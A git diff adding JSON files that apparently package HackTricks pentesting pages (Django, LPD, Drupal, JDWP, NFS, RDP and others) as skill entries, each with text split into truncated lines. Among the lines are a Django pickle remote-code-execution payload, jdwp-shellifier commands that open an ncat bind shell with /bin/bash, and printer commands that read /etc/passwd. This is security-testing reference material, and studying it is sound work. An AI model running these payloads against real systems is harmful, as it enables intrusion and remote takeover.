+ "category": "network-services-pentesting",
+ "title": "django",
+ "description": "# Django\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Cache Manipulation to RCE\nDjango's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can gain write access to the cache, they can escalate this vulnerability to RCE on the underlying server**.\n\nDjango cache is stored in one of ",
+ "payloads": [
+ "# Django",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Cache Manipulation to RCE",
+ "Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can gain write access to the cache, they can escalate this vulnerability to RCE on the underlying server**.",
+ "Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95). Cache stored in a Redis server or database are the most likely attack vectors (Redis injection and SQL injection), but an attacker may also be able to use file-based cache to turn an arbitrary write into RCE. Maintainers have marked this as a non-issue. It's important to note that the cache file folder, SQL table name, and Redis server details will vary based on implementation.",
+ "On **FileBasedCache**, the pickled value is written to a file under `CACHES['default']['LOCATION']` (often `/var/tmp/django_cache/`). If that directory is world-writable or attacker-controlled, dropping a malicious pickle under the expected cache key yields code execution when the app reads it:",
+ "```bash",
+ "python - <<'PY'",
+ "import pickle, os",
+ "class RCE:",
+ "def __reduce__(self):",
+ "return (os.system, (\"id >/tmp/pwned\",))",
+ "open('/var/tmp/django_cache/cache:malicious', 'wb').write(pickle.dumps(RCE(), protocol=4))",
+ "This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436",
+ "## Server-Side Template Injection (SSTI)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/django.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8a384ef6bb7b.json b/skills/network_services_pentesting_8a384ef6bb7b.json
new file mode 100644
index 0000000..dfdb9d2
--- /dev/null
+++ b/skills/network_services_pentesting_8a384ef6bb7b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8a384ef6bb7b",
+ "category": "network-services-pentesting",
+ "title": "515 pentesting line printer daemon lpd",
+ "description": "# 515 Pentesting Line Printer Daemon (LPD)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Introduction to LPD Protocol**\n\nIn the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds th",
+ "payloads": [
+ "# 515 Pentesting Line Printer Daemon (LPD)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Introduction to LPD Protocol**",
+ "In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**.",
+ "## **Tools for Interacting with LPD Printers**",
+ "[**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting:",
+ "```python",
+ "# To print a file to an LPD printer",
+ "lpdprint.py hostname filename",
+ "# To get a file from the printer",
+ "lpdtest.py hostname get /etc/passwd",
+ "# To upload a file to the printer",
+ "lpdtest.py hostname put ../../etc/passwd",
+ "# To remove a file from the printer",
+ "lpdtest.py hostname rm /some/file/on/printer"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8ac3488fa44a.json b/skills/network_services_pentesting_8ac3488fa44a.json
new file mode 100644
index 0000000..cf9bea8
--- /dev/null
+++ b/skills/network_services_pentesting_8ac3488fa44a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8ac3488fa44a",
+ "category": "network-services-pentesting",
+ "title": "drupal rce",
+ "description": "# Drupal RCE\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## With PHP Filter Module\n\n> [!WARNING]\n> In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which \"Allows embedded PHP code/snippets to be evaluated.\" But from version 8 this module is not installed by default.\n\n1. Go to **/modules/php** and if a 403 error is returned then the **PHP filter plugin is installed and you can continue**\n 1. If not, go t",
+ "payloads": [
+ "# Drupal RCE",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## With PHP Filter Module",
+ "> [!WARNING]",
+ "> In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which \"Allows embedded PHP code/snippets to be evaluated.\" But from version 8 this module is not installed by default.",
+ "1. Go to **/modules/php** and if a 403 error is returned then the **PHP filter plugin is installed and you can continue**",
+ "1. If not, go to `Modules` and check on the box of `PHP Filter` and then on `Save configuration`",
+ "2. Then, to exploit it, click on `Add content` , then Select `Basic Page` or `Article` and write the **PHP backdoor**, then select `PHP` code in Text format and finally select `Preview`",
+ "3. To trigger it, just access the newly created node:",
+ "```bash",
+ "curl http://drupal.local/node/3",
+ "## Install PHP Filter Module",
+ "> [!WARNING]",
+ "> In current versions it's no longer possible to install plugins by only having access to the web after the default installation.",
+ "From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8b21b1f3b51e.json b/skills/network_services_pentesting_8b21b1f3b51e.json
new file mode 100644
index 0000000..761ac26
--- /dev/null
+++ b/skills/network_services_pentesting_8b21b1f3b51e.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8b21b1f3b51e",
+ "category": "network-services-pentesting",
+ "title": "69 udp tftp",
+ "description": "# 69 - UDP TFTP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Trivial File Transfer Protocol (TFTP)** is a straightforward protocol used on **UDP port 69** that allows file transfers without needing authentication. Highlighted in **RFC 1350**, its simplicity means it lacks key security features, leading to limited use on the public Internet. However, **TFTP** is extensively utilized within large internal networks for distributing **configuration files** and **ROM image",
+ "payloads": [
+ "# 69 - UDP TFTP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Trivial File Transfer Protocol (TFTP)** is a straightforward protocol used on **UDP port 69** that allows file transfers without needing authentication. Highlighted in **RFC 1350**, its simplicity means it lacks key security features, leading to limited use on the public Internet. However, **TFTP** is extensively utilized within large internal networks for distributing **configuration files** and **ROM images** to devices such as **VoIP handsets**, thanks to its efficiency in these specific scenarios.",
+ "**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). If you have more info about this let us know for example in the [**HackTricks telegram group**](https://t.me/peass) (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).",
+ "**Default Port:** 69/UDP",
+ "PORT STATE SERVICE REASON",
+ "69/udp open tftp script-set",
+ "## Enumeration",
+ "TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` will try to brute-force default paths.",
+ "```bash",
+ "nmap -n -Pn -sU -p69 -sV --script tftp-enum ",
+ "### Download/Upload",
+ "You can use Metasploit or Python to check if you can download/upload files:",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/69-udp-tftp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8c05307b3c92.json b/skills/network_services_pentesting_8c05307b3c92.json
new file mode 100644
index 0000000..8c6a873
--- /dev/null
+++ b/skills/network_services_pentesting_8c05307b3c92.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8c05307b3c92",
+ "category": "network-services-pentesting",
+ "title": "pentesting rlogin",
+ "description": "# 513 - Pentesting Rlogin\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\nIn the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections.\n\n**Default port:** 513\n\n```\nPORT STATE SERVICE\n513/tcp open login\n```\n\n## **Login**\n\n```bash\n# Install client\napt-get install rsh-client\n```\n\nYo",
+ "payloads": [
+ "# 513 - Pentesting Rlogin",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "In the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections.",
+ "**Default port:** 513",
+ "PORT STATE SERVICE",
+ "513/tcp open login",
+ "## **Login**",
+ "```bash",
+ "# Install client",
+ "apt-get install rsh-client",
+ "You can use the following command to try to **login** to a remote host where **no password** is required for access. Try using **root** is as username:",
+ "```bash",
+ "rlogin -l ",
+ "### [Brute force](../generic-hacking/brute-force.md#rlogin)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-rlogin.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8c0cdcd29a86.json b/skills/network_services_pentesting_8c0cdcd29a86.json
new file mode 100644
index 0000000..f9c1102
--- /dev/null
+++ b/skills/network_services_pentesting_8c0cdcd29a86.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8c0cdcd29a86",
+ "category": "network-services-pentesting",
+ "title": "pentesting rdp",
+ "description": "# 3389 - Pentesting RDP\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\nDeveloped by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desk",
+ "payloads": [
+ "# 3389 - Pentesting RDP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Developed by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.",
+ "**Default port:** 3389",
+ "PORT STATE SERVICE",
+ "3389/tcp open ms-wbt-server",
+ "## Enumeration",
+ "### Automatic",
+ "```bash",
+ "nmap --script \"rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info\" -p 3389 -T4 ",
+ "It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).",
+ "### [Brute force](../generic-hacking/brute-force.md#rdp)",
+ "**Be careful, you could lock accounts**",
+ "### **Password Spraying**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-rdp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8cc0546a65ca.json b/skills/network_services_pentesting_8cc0546a65ca.json
new file mode 100644
index 0000000..4122c9d
--- /dev/null
+++ b/skills/network_services_pentesting_8cc0546a65ca.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8cc0546a65ca",
+ "category": "network-services-pentesting",
+ "title": "pentesting rpcbind",
+ "description": "# 111/TCP/UDP - Pentesting Portmapper\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\n**Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information i",
+ "payloads": [
+ "# 111/TCP/UDP - Pentesting Portmapper",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively.",
+ "**Default port:** 111/TCP/UDP, 32771 in Oracle Solaris",
+ "PORT STATE SERVICE",
+ "111/tcp open rpcbind",
+ "## Enumeration",
+ "rpcinfo irked.htb",
+ "nmap -sSUC -p111 192.168.10.1",
+ "Sometimes it doesn't give you any information, in other occasions you will get something like this:",
+ ".png>)",
+ "### Advanced `rpcinfo` usage",
+ "Leverage `rpcinfo -T udp -p ` to pull the UDP program list even when TCP/111 is filtered, then immediately run `showmount -e ` to spot world-readable NFS exports registered through rpcbind.",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-rpcbind.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_90bf763ddee0.json b/skills/network_services_pentesting_90bf763ddee0.json
new file mode 100644
index 0000000..6db35c0
--- /dev/null
+++ b/skills/network_services_pentesting_90bf763ddee0.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_90bf763ddee0",
+ "category": "network-services-pentesting",
+ "title": "nfs service pentesting",
+ "description": "# 2049 - Pentesting NFS Service\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n**NFS** is a system designed for **client/server** that enables users to seamlessly access files over a network as though these files were located within a local directory.\n\n**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).\n\n```\n2049/tcp open nfs 2-3 (RPC #100003\n```\n\n### Authentication\n\nA notable aspect of this protocol is its usual lack of built-in **authen",
+ "payloads": [
+ "# 2049 - Pentesting NFS Service",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "**NFS** is a system designed for **client/server** that enables users to seamlessly access files over a network as though these files were located within a local directory.",
+ "**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).",
+ "2049/tcp open nfs 2-3 (RPC #100003",
+ "### Authentication",
+ "A notable aspect of this protocol is its usual lack of built-in **authentication** or **authorization mechanisms**. Instead, authorization relies on **file system information**, with the server tasked with accurately translating **client-provided user information** into the file system's required **authorization format**, primarily following **UNIX syntax**.",
+ "Authentication commonly relies on **UNIX `UID`/`GID` identifiers and group memberships**. However, a challenge arises due to the potential mismatch in **`UID`/`GID` mappings** between clients and servers, leaving no room for additional verification by the server. Moreover, these details are sent by the client and trusted by the server, so a rogue client could potentially **impersonate another user sending more privileged `uid` and `gid`s.",
+ "**However, note that by default it's not possible to impersonate the `UID` 0 (root) using NFS. More on this ins the squashing section.**",
+ "#### Hosts",
+ "For better (or some) authorization, you can specify the **hosts** that can access the NFS share. This can be done in the Linux `/etc/exports` file. For example:",
+ "/PATH/TO/EXPORT\u00a0\u00a0\u00a0\u00a0\u00a0 CLIENT1(OPTIONS1) CLIENT2(OPTIONS2) ...",
+ "/media/disk/share\u00a0\u00a0 192.168.2.123(rw,sec=krb5p:krb5i)",
+ "As you can see, it allows to configure a specific **IP** or **hostname** to access the share. Only that address will be able to access the share."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/nfs-service-pentesting.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_91d01cad011e.json b/skills/network_services_pentesting_91d01cad011e.json
new file mode 100644
index 0000000..fe8061d
--- /dev/null
+++ b/skills/network_services_pentesting_91d01cad011e.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_91d01cad011e",
+ "category": "network-services-pentesting",
+ "title": "pentesting jdwp java debug wire protocol",
+ "description": "# Pentesting JDWP - Java Debug Wire Protocol\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Exploiting\n\nJDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a \"JDWP-Handshake\" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP se",
+ "payloads": [
+ "# Pentesting JDWP - Java Debug Wire Protocol",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Exploiting",
+ "JDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a \"JDWP-Handshake\" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network.",
+ "In terms of process identification, searching for the string \"jdwk\" in Java processes can indicate an active JDWP session.",
+ "The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). You can use it with different parameters:",
+ "```bash",
+ "./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data",
+ "./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something",
+ "./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept",
+ "I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.",
+ "## More details",
+ "**This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details.",
+ "1. **JDWP Overview**:",
+ "- It's a packet-based network binary protocol, primarily synchronous."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_928b4fea8c18.json b/skills/network_services_pentesting_928b4fea8c18.json
new file mode 100644
index 0000000..ac78fd8
--- /dev/null
+++ b/skills/network_services_pentesting_928b4fea8c18.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_928b4fea8c18",
+ "category": "network-services-pentesting",
+ "title": "135 pentesting msrpc",
+ "description": "# 135, 593 - Pentesting MSRPC\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe Microsoft Remote Procedure Call (MSRPC) protocol, a client-server model enabling a program to request a service from a program located on another computer without understanding the network's specifics, was initially derived from open-source software and later developed and copyrighted by Microsoft.\n\nThe RPC endpoint mapper can be accessed via TCP and UDP port 135, SMB on TCP 139 and 445 (with",
+ "payloads": [
+ "# 135, 593 - Pentesting MSRPC",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The Microsoft Remote Procedure Call (MSRPC) protocol, a client-server model enabling a program to request a service from a program located on another computer without understanding the network's specifics, was initially derived from open-source software and later developed and copyrighted by Microsoft.",
+ "The RPC endpoint mapper can be accessed via TCP and UDP port 135, SMB on TCP 139 and 445 (with a null or authenticated session), and as a web service on TCP port 593.",
+ "135/tcp open msrpc Microsoft Windows RPC",
+ "## How does MSRPC work?",
+ "Initiated by the client application, the MSRPC process involves calling a local stub procedure that then interacts with the client runtime library to prepare and transmit the request to the server. This includes converting parameters into a standard Network Data Representation format. The choice of transport protocol is determined by the runtime library if the server is remote, ensuring the RPC is delivered through the network stack.",
+ "",
+ "## **Identifying Exposed RPC Services**",
+ "Exposure of RPC services across TCP, UDP, HTTP, and SMB can be determined by querying the RPC locator service and individual endpoints. Tools such as rpcdump facilitate the identification of unique RPC services, denoted by **IFID** values, revealing service details and communication bindings:",
+ "D:\\rpctools> rpcdump [-p port] ",
+ "**IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0",
+ "Annotation: Messenger Service",
+ "UUID: 00000000-0000-0000-0000-000000000000"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/135-pentesting-msrpc.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_92fd3b85746f.json b/skills/network_services_pentesting_92fd3b85746f.json
new file mode 100644
index 0000000..57a4544
--- /dev/null
+++ b/skills/network_services_pentesting_92fd3b85746f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_92fd3b85746f",
+ "category": "network-services-pentesting",
+ "title": "electron contextisolation rce via electron internal code",
+ "description": "# Electron contextIsolation RCE via Electron internal code\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Example 1\n\nExample from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)\n\n\"exit\" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:\n\n```jav",
+ "payloads": [
+ "# Electron contextIsolation RCE via Electron internal code",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Example 1",
+ "Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)",
+ "\"exit\" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:",
+ "```javascript",
+ "process.on(\"exit\", function () {",
+ "for (let p in cachedArchives) {",
+ "if (!hasProp.call(cachedArchives, p)) continue",
+ "cachedArchives[p].destroy()",
+ "{{#ref}}",
+ "https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36",
+ "{{#endref}}",
+ ".png>)",
+ "https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_93d6052c0f9a.json b/skills/network_services_pentesting_93d6052c0f9a.json
new file mode 100644
index 0000000..a8fa89d
--- /dev/null
+++ b/skills/network_services_pentesting_93d6052c0f9a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_93d6052c0f9a",
+ "category": "network-services-pentesting",
+ "title": "ftp bounce download 2oftp file",
+ "description": "# FTP Bounce Download 2 of FTP File\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Resume\n\nIf you have access to a bounce FTP server, you can make it request files of other FTP server \\(where you know some credentials\\) and download that file to your own server.\n\n## Requirements\n\n- FTP valid credentials in the FTP Middle server\n- FTP valid credentials in Victim FTP server\n- Both server accepts the PORT command \\(bounce FTP attack\\)\n- You can write inside some directory of the FRP Middle",
+ "payloads": [
+ "# FTP Bounce Download 2 of FTP File",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Resume",
+ "If you have access to a bounce FTP server, you can make it request files of other FTP server \\(where you know some credentials\\) and download that file to your own server.",
+ "## Requirements",
+ "- FTP valid credentials in the FTP Middle server",
+ "- FTP valid credentials in Victim FTP server",
+ "- Both server accepts the PORT command \\(bounce FTP attack\\)",
+ "- You can write inside some directory of the FRP Middle server",
+ "- The middle server will have more access inside the Victim FTP Server than you for some reason \\(this is what you are going to exploit\\)",
+ "## Steps",
+ "1. Connect to your own FTP server and make the connection passive \\(pasv command\\) to make it listen in a directory where the victim service will send the file",
+ "2. Make the file that is going to send the FTP Middle server t the Victim server \\(the exploit\\). This file will be a plaint text of the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.",
+ "3. Connect to the FTP Middle Server and upload de previous file",
+ "4. Make the FTP Middle server establish a connection with the victim server and send the exploit file"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_94af8d03fbdd.json b/skills/network_services_pentesting_94af8d03fbdd.json
new file mode 100644
index 0000000..70bea27
--- /dev/null
+++ b/skills/network_services_pentesting_94af8d03fbdd.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_94af8d03fbdd",
+ "category": "network-services-pentesting",
+ "title": "4786 cisco smart install",
+ "description": "# 4786 - Cisco Smart Install\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\n**Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.**\n\n**Default port:** 4786\n\n```\nPORT STATE SERVICE\n4786/tcp open smart-install\n```\n\n## **Smart Install Exploitation",
+ "payloads": [
+ "# 4786 - Cisco Smart Install",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.**",
+ "**Default port:** 4786",
+ "PORT STATE SERVICE",
+ "4786/tcp open smart-install",
+ "## **Smart Install Exploitation Tool**",
+ "**In 2018, a critical vulnerability, CVE-2018\u20130171, was found in this protocol. The threat level is 9.8 on the CVSS scale.**",
+ "**A specially crafted packet sent to the TCP/4786 port, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:**",
+ "- forcibly reboot the device",
+ "- call RCE",
+ "- steal configurations of network equipment.",
+ "**The** [**SIET**](https://github.com/frostbits-security/SIET) **(Smart Install Exploitation Tool)** was developed to exploit this vulnerability, it allows you to abuse Cisco Smart Install. In this article I will show you how you can read a legitimate network hardware configuration file. Configure exfiltration can be valuable for a pentester because it will learn about the unique features of the network. And this will make life easier and allow finding new vectors for an attack.",
+ "**The target device will be a \u201clive\u201d Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on the real hardware.**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/4786-cisco-smart-install.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_94ee024c6332.json b/skills/network_services_pentesting_94ee024c6332.json
new file mode 100644
index 0000000..c4686cb
--- /dev/null
+++ b/skills/network_services_pentesting_94ee024c6332.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_94ee024c6332",
+ "category": "network-services-pentesting",
+ "title": "ipsec ike vpn pentesting",
+ "description": "# 500/udp - Pentesting IPsec/IKE VPN\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.\n\nThe establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designe",
+ "payloads": [
+ "# 500/udp - Pentesting IPsec/IKE VPN",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.",
+ "The establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases:",
+ "- **Phase 1:** A secure channel is created between two endpoints. This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or **aggressive mode**.",
+ "- **Phase 1.5:** Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password.",
+ "- **Phase 2:** This phase is dedicated to negotiating the parameters for securing data with **ESP** and **AH**. It allows for the use of algorithms different from those in Phase 1 to ensure **Perfect Forward Secrecy (PFS)**, enhancing security.",
+ "**Default port:** 500/udp",
+ "Also commonly exposed: 4500/udp (NAT Traversal)",
+ "## **Discover** the service using nmap",
+ "root@bt:~# nmap -sU -p 500 172.16.21.200",
+ "Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST",
+ "Nmap scan report for 172.16.21.200",
+ "Host is up (0.00036s latency)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md"
+ ]
+}
